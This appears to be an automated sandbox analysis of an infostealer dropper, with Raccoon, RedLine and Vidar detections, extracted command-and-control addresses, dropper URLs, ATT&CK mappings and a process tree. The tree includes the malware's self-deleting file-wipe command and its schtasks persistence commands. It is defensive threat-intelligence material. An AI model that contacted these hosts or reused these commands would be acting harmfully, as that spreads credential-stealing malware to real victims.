raccoon | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

Target

Setup (26).exe
Size

631KB
MD5

cb927513ff8ebff4dd52a47f7e42f934
SHA1

0de47c02a8adc4940a6c18621b4e4a619641d029
SHA256

fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
SHA512

988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Score

10^/10

raccoon redline vidar 1 bratanchikaye d02c5d65069fc7ce1993e7c52edf0c9c4c195c81 norman2 spnewportspectr discovery evasion infostealer stealer themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://kmsauto.us/1/fix.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://ia601409.us.archive.org/7/items/fixmix_fix_4348843584358435/fixmix_fix_4348843584358435.txt

Extracted

Family

redline

Botnet

bratanchikAYE

45.14.49.232:63850

Extracted

Family

redline

Botnet

NORMAN2

45.14.49.184:27587

Extracted

Family

raccoon

Botnet

d02c5d65069fc7ce1993e7c52edf0c9c4c195c81

Attributes

url4cnc
https://telete.in/open3entershift

rc4.plain

Extracted

Family

redline

Botnet

37.0.8.88:44263

Extracted

Family

redline

Botnet

spnewportspectr

135.148.139.222:1594

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5476	200	rundll32.exe	142

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 29 IoCs

resource	yara_rule
behavioral19/files/0x000100000001ab6a-143.dat	family_redline
behavioral19/files/0x000100000001ab6a-153.dat	family_redline
behavioral19/memory/416-265-0x000000000041C5EE-mapping.dmp	family_redline
behavioral19/memory/1160-266-0x000000000041C5BE-mapping.dmp	family_redline
behavioral19/memory/4368-282-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral19/memory/2532-298-0x000000000041C5BE-mapping.dmp	family_redline
behavioral19/memory/1160-301-0x00000000050E0000-0x00000000056E6000-memory.dmp	family_redline
behavioral19/memory/4688-288-0x000000000041C5EE-mapping.dmp	family_redline
behavioral19/memory/416-294-0x0000000005480000-0x0000000005A86000-memory.dmp	family_redline
behavioral19/memory/4368-286-0x000000000041C5CA-mapping.dmp	family_redline
behavioral19/memory/2532-341-0x00000000051B0000-0x00000000057B6000-memory.dmp	family_redline
behavioral19/memory/2648-392-0x00000000055D0000-0x0000000005BD6000-memory.dmp	family_redline
behavioral19/memory/5312-403-0x000000000041C5EE-mapping.dmp	family_redline
behavioral19/memory/5740-435-0x000000000041C5CA-mapping.dmp	family_redline
behavioral19/memory/5164-475-0x0000000004DA0000-0x00000000053A6000-memory.dmp	family_redline
behavioral19/memory/5488-527-0x0000000005160000-0x0000000005766000-memory.dmp	family_redline
behavioral19/memory/2676-614-0x0000000004D40000-0x0000000005346000-memory.dmp	family_redline
behavioral19/memory/4480-525-0x0000000005460000-0x0000000005A66000-memory.dmp	family_redline
behavioral19/memory/5836-441-0x000000000041C5BE-mapping.dmp	family_redline
behavioral19/memory/5036-397-0x0000000005770000-0x0000000005D76000-memory.dmp	family_redline
behavioral19/memory/5276-402-0x000000000041C5BE-mapping.dmp	family_redline
behavioral19/memory/5164-393-0x000000000041C5CA-mapping.dmp	family_redline
behavioral19/memory/1736-363-0x000000000041C5EE-mapping.dmp	family_redline
behavioral19/memory/4248-358-0x000000000041C5BE-mapping.dmp	family_redline
behavioral19/memory/4368-336-0x0000000005040000-0x0000000005646000-memory.dmp	family_redline
behavioral19/memory/2648-330-0x000000000041C5EE-mapping.dmp	family_redline
behavioral19/memory/5036-331-0x000000000041C5CA-mapping.dmp	family_redline
behavioral19/memory/1160-264-0x0000000000400000-0x000000000044A000-memory.dmp	family_redline
behavioral19/memory/416-263-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral19/memory/1560-275-0x00000000007F0000-0x00000000008C3000-memory.dmp	family_vidar
behavioral19/memory/1560-278-0x0000000000400000-0x0000000000593000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 23 IoCs

pid	Process
3172	8gJkfQLb9nYx0bzO0p5ui2PY.exe
3752	fsO2YGFIZ4QF6fcUoZjF3jSf.exe
2240	5HFYdCwMnUiVyZbcFNteNxIO.exe
3748	nouXFQQ6gwdEahvXrRepMrFN.exe
2460	qZiinpAw37x3FOcAwBbGRYDc.exe
1156	KeLQabtEJ9pGpX1Xs16C6KJW.exe
3160	sQ3lrE2Bpr5h1oI0g8wcV3RN.exe
492	tcpsi1TMZ6ydNHjthOgtI70s.exe
1420	YeMtkoP3E6fKtR0xshI8TQuP.exe
3908	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
1632	fwau6QCgV0n5Q626x1G3hGMh.exe
3132	rFF6cE2bDCyBN9gVnUOmc2oD.exe
1560	ttBVzajf5NuW3Wp25Yb1x5z_.exe
2244	1Ksr9cx_IfC7QUTQfEMopB8e.exe
768	zK3I5DvxlLqA3epTyfjnfn3X.exe
2052	bPKTaDXeFDHEbGWBT3qYfzcu.exe
2896	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
788	v9wazG7G_ZThk9NJ5eT96t0v.exe
3344	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
4160	xYWZ79E_cUaCc2gsSdAXmjDK.exe
4232	DAddrpVmHEoE9SK3313AGlgv.exe
4276	xYWZ79E_cUaCc2gsSdAXmjDK.exe
4328	ghtUbTrayCQ0VKVO6v0AUv6Y.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Setup (26).exe

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral19/files/0x000100000001ab79-150.dat	themida
behavioral19/files/0x000100000001ab82-155.dat	themida
behavioral19/memory/2244-238-0x0000000000360000-0x0000000000361000-memory.dmp	themida
behavioral19/memory/3132-244-0x0000000000960000-0x0000000000961000-memory.dmp	themida
behavioral19/files/0x000100000001ab79-172.dat	themida
behavioral19/files/0x000100000001ab82-164.dat	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 23 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
113	ip-api.com
899	freegeoip.app
900	ipinfo.io
2936	ipinfo.io
1851	ipinfo.io
167	ipinfo.io
439	ipinfo.io
1170	ipinfo.io
1594	ipinfo.io
1598	ipinfo.io
902	ipinfo.io
1175	ipinfo.io
1347	ipinfo.io
30	ipinfo.io
31	ipinfo.io
168	ipinfo.io
861	freegeoip.app
886	freegeoip.app
2937	ipinfo.io
123	ipinfo.io
124	ipinfo.io
435	ipinfo.io
930	freegeoip.app

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst001.exe	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	s3fI1Ks3w3WQZHQVQ5vchIY5.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	s3fI1Ks3w3WQZHQVQ5vchIY5.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

pid	pid_target	Process	procid_target
6192	3908	WerFault.exe	148
6900	3748	WerFault.exe	84
6148	3172	WerFault.exe	87
6208	3344	WerFault.exe	101
5452	3748	WerFault.exe	84
7340	4160	WerFault.exe	100
7332	3172	WerFault.exe	87
7260	3748	WerFault.exe	84
7436	4160	WerFault.exe	100
7228	3172	WerFault.exe	87
6148	3344	WerFault.exe	101
7740	4160	WerFault.exe	100
8084	3748	WerFault.exe	84
4612	3172	WerFault.exe	87
4360	3344	WerFault.exe	101
748	3344	WerFault.exe	101
6864	3160	WerFault.exe	81
6712	7740	WerFault.exe	251
4612	3344	WerFault.exe	101
7020	3160	WerFault.exe	81
8968	3344	WerFault.exe	101
9176	3160	WerFault.exe	81
8396	4160	WerFault.exe	100
8480	3748	WerFault.exe	84
8852	3172	WerFault.exe	87
2384	3172	WerFault.exe	87
8300	3160	WerFault.exe	81
8696	4160	WerFault.exe	100
1780	3172	WerFault.exe	87
9012	7332	WerFault.exe	307
2688	3748	WerFault.exe	84
7556	6248	WerFault.exe	207
4716	6480	WerFault.exe	328
4544	3748	WerFault.exe	84
6464	6248	WerFault.exe	207
8976	6248	WerFault.exe	207
9244	3748	WerFault.exe	84
9668	6248	WerFault.exe	207
10172	3344	WerFault.exe	101
9232	3748	WerFault.exe	84
4556	6248	WerFault.exe	207
9816	3344	WerFault.exe	101
10184	3748	WerFault.exe	84
9292	6248	WerFault.exe	207
10024	3748	WerFault.exe	84
10204	10140	WerFault.exe	402
3008	6248	WerFault.exe	207
3008	2624	WerFault.exe	419
9404	3748	WerFault.exe	84
1304	8808	WerFault.exe	422
9352	6248	WerFault.exe	207
2820	3748	WerFault.exe	84
10544	3748	WerFault.exe	84
10812	10464	WerFault.exe	443
11752	9676	WerFault.exe	504
11560	7852	WerFault.exe	456
11444	7852	WerFault.exe	456
11992	7852	WerFault.exe	456
11292	11772	WerFault.exe	526
10296	7852	WerFault.exe	456
11032	10512	WerFault.exe	536
11772	6968	WerFault.exe	537
12452	7852	WerFault.exe	456
13256	12340	WerFault.exe	544

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
8768	schtasks.exe
4084	schtasks.exe
10572	schtasks.exe
10448	schtasks.exe
13032	schtasks.exe
13024	schtasks.exe
8420	schtasks.exe
3704	schtasks.exe
3732	schtasks.exe
7184	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
11684	timeout.exe
8776	timeout.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
14036	taskkill.exe
6440	taskkill.exe
8032	taskkill.exe
7396	taskkill.exe
11336	taskkill.exe
13880	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
800	Setup (26).exe
800	Setup (26).exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 800 wrote to memory of 3172	800	Setup (26).exe	87
PID 800 wrote to memory of 3172	800	Setup (26).exe	87
PID 800 wrote to memory of 3172	800	Setup (26).exe	87
PID 800 wrote to memory of 3752	800	Setup (26).exe	88
PID 800 wrote to memory of 3752	800	Setup (26).exe	88
PID 800 wrote to memory of 2460	800	Setup (26).exe	83
PID 800 wrote to memory of 2460	800	Setup (26).exe	83
PID 800 wrote to memory of 2460	800	Setup (26).exe	83
PID 800 wrote to memory of 3748	800	Setup (26).exe	84
PID 800 wrote to memory of 3748	800	Setup (26).exe	84
PID 800 wrote to memory of 3748	800	Setup (26).exe	84
PID 800 wrote to memory of 2240	800	Setup (26).exe	82
PID 800 wrote to memory of 2240	800	Setup (26).exe	82
PID 800 wrote to memory of 2240	800	Setup (26).exe	82
PID 800 wrote to memory of 1156	800	Setup (26).exe	85
PID 800 wrote to memory of 1156	800	Setup (26).exe	85
PID 800 wrote to memory of 1156	800	Setup (26).exe	85
PID 800 wrote to memory of 3160	800	Setup (26).exe	81
PID 800 wrote to memory of 3160	800	Setup (26).exe	81
PID 800 wrote to memory of 3160	800	Setup (26).exe	81
PID 800 wrote to memory of 1420	800	Setup (26).exe	86
PID 800 wrote to memory of 1420	800	Setup (26).exe	86
PID 800 wrote to memory of 1420	800	Setup (26).exe	86
PID 800 wrote to memory of 492	800	Setup (26).exe	80
PID 800 wrote to memory of 492	800	Setup (26).exe	80
PID 800 wrote to memory of 492	800	Setup (26).exe	80
PID 800 wrote to memory of 3908	800	Setup (26).exe	148
PID 800 wrote to memory of 3908	800	Setup (26).exe	148
PID 800 wrote to memory of 3908	800	Setup (26).exe	148
PID 800 wrote to memory of 1632	800	Setup (26).exe	78
PID 800 wrote to memory of 1632	800	Setup (26).exe	78
PID 800 wrote to memory of 1632	800	Setup (26).exe	78
PID 800 wrote to memory of 1560	800	Setup (26).exe	91
PID 800 wrote to memory of 1560	800	Setup (26).exe	91
PID 800 wrote to memory of 1560	800	Setup (26).exe	91
PID 800 wrote to memory of 3132	800	Setup (26).exe	90
PID 800 wrote to memory of 3132	800	Setup (26).exe	90
PID 800 wrote to memory of 3132	800	Setup (26).exe	90
PID 800 wrote to memory of 2244	800	Setup (26).exe	95
PID 800 wrote to memory of 2244	800	Setup (26).exe	95
PID 800 wrote to memory of 2244	800	Setup (26).exe	95
PID 800 wrote to memory of 768	800	Setup (26).exe	96
PID 800 wrote to memory of 768	800	Setup (26).exe	96
PID 800 wrote to memory of 768	800	Setup (26).exe	96
PID 800 wrote to memory of 2052	800	Setup (26).exe	105
PID 800 wrote to memory of 2052	800	Setup (26).exe	105
PID 800 wrote to memory of 2052	800	Setup (26).exe	105
PID 800 wrote to memory of 2896	800	Setup (26).exe	104
PID 800 wrote to memory of 2896	800	Setup (26).exe	104
PID 800 wrote to memory of 2896	800	Setup (26).exe	104
PID 800 wrote to memory of 788	800	Setup (26).exe	102
PID 800 wrote to memory of 788	800	Setup (26).exe	102
PID 800 wrote to memory of 788	800	Setup (26).exe	102
PID 800 wrote to memory of 3344	800	Setup (26).exe	531
PID 800 wrote to memory of 3344	800	Setup (26).exe	531
PID 800 wrote to memory of 3344	800	Setup (26).exe	531
PID 800 wrote to memory of 4160	800	Setup (26).exe	353
PID 800 wrote to memory of 4160	800	Setup (26).exe	353
PID 800 wrote to memory of 4160	800	Setup (26).exe	353
PID 800 wrote to memory of 4232	800	Setup (26).exe	441
PID 800 wrote to memory of 4232	800	Setup (26).exe	441
PID 800 wrote to memory of 4276	800	Setup (26).exe	440
PID 800 wrote to memory of 4276	800	Setup (26).exe	440
PID 800 wrote to memory of 4276	800	Setup (26).exe	440

C:\Users\Admin\AppData\Local\Temp\Setup (26).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (26).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:800
- C:\Users\Admin\Documents\fwau6QCgV0n5Q626x1G3hGMh.exe
  "C:\Users\Admin\Documents\fwau6QCgV0n5Q626x1G3hGMh.exe"
  2⤵
  - Executes dropped EXE
  PID:1632
- C:\Users\Admin\Documents\yBmUtTQ9gaXjJLSIpNMAGnC9.exe
  "C:\Users\Admin\Documents\yBmUtTQ9gaXjJLSIpNMAGnC9.exe"
  2⤵
  PID:3908
- - C:\Program Files (x86)\Company\NewProduct\inst001.exe
    "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
    3⤵
    PID:4540
- C:\Users\Admin\Documents\tcpsi1TMZ6ydNHjthOgtI70s.exe
  "C:\Users\Admin\Documents\tcpsi1TMZ6ydNHjthOgtI70s.exe"
  2⤵
  - Executes dropped EXE
  PID:492
- - C:\Users\Admin\Documents\tcpsi1TMZ6ydNHjthOgtI70s.exe
    "C:\Users\Admin\Documents\tcpsi1TMZ6ydNHjthOgtI70s.exe"
    3⤵
    PID:6880
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im tcpsi1TMZ6ydNHjthOgtI70s.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\tcpsi1TMZ6ydNHjthOgtI70s.exe" & del C:\ProgramData\*.dll & exit
      4⤵
      PID:8924
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im tcpsi1TMZ6ydNHjthOgtI70s.exe /f
        5⤵
        Kills process with taskkill
        
        PID:7396
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        5⤵
        Delays execution with timeout.exe
        
        PID:11684
- C:\Users\Admin\Documents\sQ3lrE2Bpr5h1oI0g8wcV3RN.exe
  "C:\Users\Admin\Documents\sQ3lrE2Bpr5h1oI0g8wcV3RN.exe"
  2⤵
  - Executes dropped EXE
  PID:3160
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 624
    3⤵
    - Program crash
    PID:6864
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 632
    3⤵
    - Program crash
    PID:7020
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 716
    3⤵
    - Program crash
    PID:9176
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 684
    3⤵
    - Program crash
    PID:8300
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 824
    3⤵
    PID:16088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 828
    3⤵
    PID:4436
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 828
    3⤵
    PID:22172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 932
    3⤵
    PID:21872
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 884
    3⤵
    PID:24552
- C:\Users\Admin\Documents\5HFYdCwMnUiVyZbcFNteNxIO.exe
  "C:\Users\Admin\Documents\5HFYdCwMnUiVyZbcFNteNxIO.exe"
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Users\Admin\Documents\qZiinpAw37x3FOcAwBbGRYDc.exe
  "C:\Users\Admin\Documents\qZiinpAw37x3FOcAwBbGRYDc.exe"
  2⤵
  - Executes dropped EXE
  PID:2460
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:3704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4084
- - C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
    "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
    3⤵
    PID:4888
  - - C:\Users\Admin\Documents\qSTz0DeIqWb9zHTW2cgsN9qK.exe
      "C:\Users\Admin\Documents\qSTz0DeIqWb9zHTW2cgsN9qK.exe"
      4⤵
      PID:6404
    - - C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
        
        "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
        5⤵
        
        PID:9172
      - C:\Users\Admin\Documents\iPLJL2vTulhnRTrGfAdHbvrP.exe
        
        "C:\Users\Admin\Documents\iPLJL2vTulhnRTrGfAdHbvrP.exe"
        6⤵
        
        PID:7852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 384
        7⤵
        Program crash
        
        PID:11560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 396
        7⤵
        Program crash
        
        PID:11444
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 436
        7⤵
        Program crash
        
        PID:11992
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 580
        7⤵
        Program crash
        
        PID:10296
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 684
        7⤵
        Program crash
        
        PID:12452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 692
        7⤵
        
        PID:13116
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 584
        7⤵
        
        PID:13076
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 652
        7⤵
        
        PID:13328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 564
        7⤵
        
        PID:7928
      - C:\Users\Admin\Documents\D0Imgz2etgBy0TVchA6CB3GR.exe
        
        "C:\Users\Admin\Documents\D0Imgz2etgBy0TVchA6CB3GR.exe"
        6⤵
        
        PID:10352
        
        C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
        
        "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
        7⤵
        
        PID:9336
        
        C:\Users\Admin\Documents\dZZklgwkQME7NOrts5T0N7HH.exe
        
        "C:\Users\Admin\Documents\dZZklgwkQME7NOrts5T0N7HH.exe"
        8⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        9⤵
        Creates scheduled task(s)
        
        PID:13032
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        9⤵
        Creates scheduled task(s)
        
        PID:13024
        
        C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe
        
        "C:\Users\Admin\Documents\J77cmUgJX0OQi4nZtiqUPG2L.exe"
        9⤵
        
        PID:13016
        
        C:\Users\Admin\Documents\nDIQTro220_lEdAV_4ZOo2tY.exe
        
        "C:\Users\Admin\Documents\nDIQTro220_lEdAV_4ZOo2tY.exe"
        10⤵
        
        PID:15328
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        11⤵
        Creates scheduled task(s)
        
        PID:8768
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        11⤵
        Creates scheduled task(s)
        
        PID:8420
        
        C:\Users\Admin\Documents\D3F5xhv3EdWZYJHALxxXAp3K.exe
        
        "C:\Users\Admin\Documents\D3F5xhv3EdWZYJHALxxXAp3K.exe"
        10⤵
        
        PID:14384
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14384 -s 384
        11⤵
        
        PID:20848
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14384 -s 620
        11⤵
        
        PID:22208
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14384 -s 672
        11⤵
        
        PID:10608
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14384 -s 672
        11⤵
        
        PID:23508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14384 -s 716
        11⤵
        
        PID:23120
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 14384 -s 600
        11⤵
        
        PID:6020
        
        C:\Users\Admin\Documents\N08Mdb0Gl6Vgacmk6sIiTk93.exe
        
        "C:\Users\Admin\Documents\N08Mdb0Gl6Vgacmk6sIiTk93.exe"
        8⤵
        
        PID:5572
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 384
        9⤵
        
        PID:13336
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 364
        9⤵
        
        PID:7660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 400
        9⤵
        
        PID:15204
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 680
        9⤵
        
        PID:14888
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 624
        9⤵
        
        PID:15260
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 704
        9⤵
        
        PID:9504
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 624
        9⤵
        
        PID:10856
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 592
        9⤵
        
        PID:6756
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 724
        9⤵
        
        PID:11820
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 832
        9⤵
        
        PID:18216
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 812
        9⤵
        
        PID:18692
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 824
        9⤵
        
        PID:22340
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 848
        9⤵
        
        PID:22288
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:10572
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:10448
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:3732
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        5⤵
        Creates scheduled task(s)
        
        PID:7184
  - - C:\Users\Admin\Documents\MnfFPPO5BkRFubr1pgN1ph16.exe
      "C:\Users\Admin\Documents\MnfFPPO5BkRFubr1pgN1ph16.exe"
      4⤵
      PID:6248
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 408
        5⤵
        Program crash
        
        PID:7556
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 392
        5⤵
        Program crash
        
        PID:6464
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 380
        5⤵
        Program crash
        
        PID:8976
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 508
        5⤵
        Program crash
        
        PID:9668
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 656
        5⤵
        Program crash
        
        PID:4556
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 712
        5⤵
        Program crash
        
        PID:9292
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 680
        5⤵
        Program crash
        
        PID:3008
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 672
        5⤵
        Program crash
        
        PID:9352
